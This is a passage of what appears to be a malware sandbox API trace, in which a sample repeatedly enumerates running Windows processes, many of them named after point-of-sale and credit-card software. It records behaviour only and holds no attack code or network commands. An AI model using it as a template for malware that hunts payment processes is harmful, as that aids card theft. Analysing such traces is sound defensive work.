lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0262.587] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0262.589] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0262.590] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0262.592] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0262.594] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0262.596] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0262.598] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0262.599] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0262.601] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0262.603] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0262.605] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0262.607] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0262.608] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0262.610] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0262.611] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0262.613] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0262.614] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0262.619] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0262.621] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0262.622] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.624] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.626] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0262.627] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.629] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.631] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0262.632] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0262.634] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0262.635] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.639] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0262.640] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0262.642] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0262.643] CloseHandle (hObject=0x2338) returned 1 [0262.643] Sleep (dwMilliseconds=0x64) [0262.682] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0262.692] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.703] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.704] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.706] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.707] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.709] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.711] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.712] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.713] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.715] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.717] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.719] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.720] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.721] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.723] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.724] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.726] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.728] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.729] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.731] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.732] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0262.734] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.735] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0262.737] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.741] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0262.743] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0262.744] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0262.746] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0262.751] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0262.752] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0262.754] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.755] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.756] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0262.758] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.759] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.761] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.763] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0262.764] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0262.765] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0262.767] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0262.768] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0262.771] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0262.772] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0262.774] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0262.775] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0262.777] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0262.778] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0262.779] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0262.781] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0262.794] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0262.796] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, 